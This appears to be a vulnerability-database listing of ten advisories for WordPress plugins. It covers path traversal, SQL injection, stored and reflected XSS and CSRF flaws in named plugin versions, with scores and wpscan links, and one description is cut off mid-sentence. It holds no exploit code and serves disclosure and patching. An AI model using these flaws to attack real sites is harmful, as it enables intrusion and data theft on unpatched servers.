CVSS: 4.1EPSS: 0%CPEs: 1EXPL: 1CVE-2025-2048 – Lana Downloads Manager < 1.10.0 - Admin+ Arbitrary File Download via Path Traversal
https://notcve.org/view.php?id=CVE-2025-2048
01 Apr 2025 — The Lana Downloads Manager WordPress plugin before 1.10.0 does not validate user input used in a path, which could allow users with an admin role to perform path traversal attacks and download arbitrary files on the server • https://wpscan.com/vulnerability/05c664e8-110e-4a31-8377-41a0422508a7 •
CVSS: 4.1EPSS: 0%CPEs: 1EXPL: 1CVE-2025-1986 – Gutentor < 3.4.7 - Admin+ SQL Injection
https://notcve.org/view.php?id=CVE-2025-1986
01 Apr 2025 — The Gutentor WordPress plugin before 3.4.7 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks • https://wpscan.com/vulnerability/f1414750-19ee-4a5d-b255-a9c20168b716 •
CVSS: 6.1EPSS: 0%CPEs: 1EXPL: 1CVE-2025-0613 – Photo Gallery < 1.8.34 - Unauthenticated Stored XSS
https://notcve.org/view.php?id=CVE-2025-0613
31 Mar 2025 — The Photo Gallery by 10Web WordPress plugin before 1.8.34 does not sanitised and escaped comment added on images by unauthenticated users, leading to an Unauthenticated Stored-XSS attack when comments are displayed • https://wpscan.com/vulnerability/22be2b44-cd42-4b02-8448-59dd2989dde1 •
CVSS: 4.3EPSS: 0%CPEs: 1EXPL: 1CVE-2025-1762 – Event Tickets with Ticket Scanner < 2.5.4 - Arbitrary Tickets Deletion via CSRF
https://notcve.org/view.php?id=CVE-2025-1762
28 Mar 2025 — The Event Tickets with Ticket Scanner WordPress plugin before 2.5.4 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack • https://wpscan.com/vulnerability/d5cefdee-2ba0-465d-b176-0dff39fc322c •
CVSS: 8.8EPSS: 0%CPEs: 1EXPL: 1CVE-2024-13146 – Booknetic < 4.1.5 - Staff Creation via CSRF
https://notcve.org/view.php?id=CVE-2024-13146
26 Mar 2025 — The Booknetic WordPress plugin before 4.1.5 does not have CSRF check when creating Staff accounts, which could allow attackers to make logged in admin add arbitrary Staff members via a CSRF attack • https://wpscan.com/vulnerability/19cb40dd-53b0-46db-beb0-1841e385ce09 •
CVSS: 3.5EPSS: 0%CPEs: 1EXPL: 1CVE-2024-12683 – Smart Maintenance Mode < 1.5.2 - Admin+ Stored XSS
https://notcve.org/view.php?id=CVE-2024-12683
26 Mar 2025 — The Smart Maintenance Mode WordPress plugin before 1.5.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). • https://wpscan.com/vulnerability/1569ee00-56c3-4a1b-940e-e0256a748675 •
CVSS: 3.5EPSS: 0%CPEs: 1EXPL: 1CVE-2025-1452 – Favorites < 2.3.5 - Admin+ Stored XSS
https://notcve.org/view.php?id=CVE-2025-1452
25 Mar 2025 — The Favorites WordPress plugin before 2.3.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). • https://wpscan.com/vulnerability/47365daf-7ef5-471a-ab0e-f6d1b40ca56c •
CVSS: 7.5EPSS: 0%CPEs: 1EXPL: 1CVE-2025-0717 – Social Slider Feed < 2.2.9 - Admin+ Stored XSS
https://notcve.org/view.php?id=CVE-2025-0717
25 Mar 2025 — To exploit the vulnerability, it is necessary: • https://wpscan.com/vulnerability/31f734fc-d474-46b3-98eb-04761cab8878 •
CVSS: 7.5EPSS: 0%CPEs: 1EXPL: 1CVE-2024-9770 – WP-Recall < 16.26.12 - Admin+ SQL Injection
https://notcve.org/view.php?id=CVE-2024-9770
25 Mar 2025 — The WP-Recall WordPress plugin before 16.26.12 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks • https://wpscan.com/vulnerability/d31f8713-b807-4ac4-8897-7d62a93bb2db •
CVSS: 7.1EPSS: 0%CPEs: 1EXPL: 1CVE-2024-13863 – Stylish Google Sheet Reader < 4.1 - Reflected XSS
https://notcve.org/view.php?id=CVE-2024-13863
25 Mar 2025 — The Stylish Google Sheet Reader 4.0 WordPress plugin before 4.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin • https://wpscan.com/vulnerability/a6161595-0934-4baa-9da6-73792f4b87fd •